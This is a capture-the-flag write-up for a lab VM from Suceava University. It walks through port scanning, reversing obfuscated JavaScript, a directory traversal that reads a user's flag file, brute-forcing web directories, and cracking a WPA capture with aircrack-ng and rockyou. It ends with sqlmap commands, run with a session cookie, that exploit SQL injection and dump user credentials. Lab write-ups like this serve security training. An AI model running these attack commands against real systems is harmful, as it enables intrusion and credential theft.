If you are interested in the way how I found all flags - welcome!
Let's start, IP address could be found after VM is booted.
If you do not want to view all write-up below you can find little hints:
1) Have a look at SSL certificate
3) Have a look at page sources on tcp/15020
4) Find webdir with network traffic dump, uncover password and use it
5) Find sql injection in admin area
Below you can find my own way how I got flags.
Nmap helps us with enumerating open ports:
Not shown: 65526 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
4369/tcp open epmd
5222/tcp open xmpp-client
5269/tcp open xmpp-server
5280/tcp open xmpp-bosh
15020/tcp open unknown
37833/tcp open unknown
Next step is to detect service's and OS versions, use these Nmap keys: -A -sV
Ok, we have updated Debian with patched Proftpd 1.3.5b, Jabber service and some http/https services.
The first flag is very easy, it is located in SSL certificate data on tcp/15020 : France: a51f0eda836e4461c3316a2ec9dad743
At the first look I was not convinced that it is a flag, but when I found all other flags and only 1 left I decided that it is a flag, because I could not verity it anywhere =)
Lets continue with web services, and what we usually do on the first step - yeah, brute subdirs!
To complete this steps just foloow steps back with _0xb252x4 and got the flag.
_0xb252x4+= 4469; //after minus string = 77779673
_0xb252x4-= 234562221224; //after plus = 777796734469
_0xb252x4*= 1988; //after div by 1988 = 543234513245
document[_0xeb5f](_0xeb5f)[_0xeb5f]= _0xeb5f+ _0xb252x5
Ok, these two flags I got very fast and later stuck a little with web site on tcp/15020 before I saw a commented message about download.php in the page source at http://192.168.56.102/blog/:
A message about image parameter tells us that we have to use post request and probably it is a Directory Traversal!
Created a simple post request in Burp I verified it.
And web server response:
Now we can read files, that are available for web service use and in BLOG we remember a comment from Kevin, that flag.txt is located in his house, lets check /home/kevin/flag.txt.
Third flag is captured: Croatia: e4d49769b40647eddda2fe3041b9564c
Ok, 3 flags..I found webdir /admin in blog and tried to find, enumerate, dump all data from the host - no luck, sensitive files are in admin with possible SQL Injection vulnerability. Grabbed data from host was a little bit useless...
I got all usernames, tried to bruteforce ftp, ssh, admin web panel on the blog web site, got mysql username and password - no luck, no way to connect to MySQL server...
It was a time to think once again, "ENUMERATION IS A KEY" appears in my head and I started extended webdirs bruteforce, result was very nice - new webdir named /vault.
Now there are 300 webdirs named DoorX with 100 subdirs VaultX in each, time to create simple python script to create "wordlists" and fire-up Burp Intruder, probably there is something useful in one of these dirs.
for i in range (1, 101):
print "Vault" + str(i)
2 not empty webdirs were uncoverd:
A fast look on ctf.cap gave an attack vector - determine WPA password and see that can do with it (also there is rockyou.zip...) =)
It is aircrack-ng time: aircrack-ng ctf.cap -w rockyou.txt
Password found: minion.666, nothing interesting was found in the network traffic dump and I decided to check this password on /blog/admin, it works!
Login and see page source - forth flag: Philippines: 551d3350f100afc6fac0e4b48d44d380
It is a time to find final flag, sign-in to admin panel, tried to do something like edit post, delete posts - nothing, but from source codes I remember that edit.php probable is vulnerably to SQL Injection.
It is time for SQLMap (because I like it):
//Do not forget about admin cookie =)
sqlmap -u 'https://192.168.56.102:15020/blog/admin/edit.php?id=1' -H 'Cookie: PHPSESSID=tt728u83rtlg6kcpdbbcu0kr36'
and it is vulnerable:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9485=9485
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 3390=BENCHMARK(5000000,MD5(0x554e4b4a))
Next steps with enumeration all tables and columns is not so interesting. Finally I got all column names, but SQLMap could not dump data, and we have a SQL Injection => we can use sql query to dump data manually.
| comments |
| posts |
| users |
| Column | Type |
| id | numeric |
| idcountry | numeric |
| login | non-numeric |
| password | non-numeric |
| published | numeric |
| text | non-numeric |
| title | non-numeric |
sqlmap -u 'https://192.168.56.102:15020/blog/admin/edit.php?id=1' -H 'Cookie: PHPSESSID=tt728u83rtlg6kcpdbbcu0kr36' --sql-query='select id,idcountry,login,password from users where id=1'
[*] 1, , admin, 8ae100f50c9bbcfeb2ab87b72a03273d - this is admin password minion.666
Change id=2 and got the flag for Laos.
Finally all flags are captured.
Thank you to Suceava University for this VM!
That's all, thank you for reading!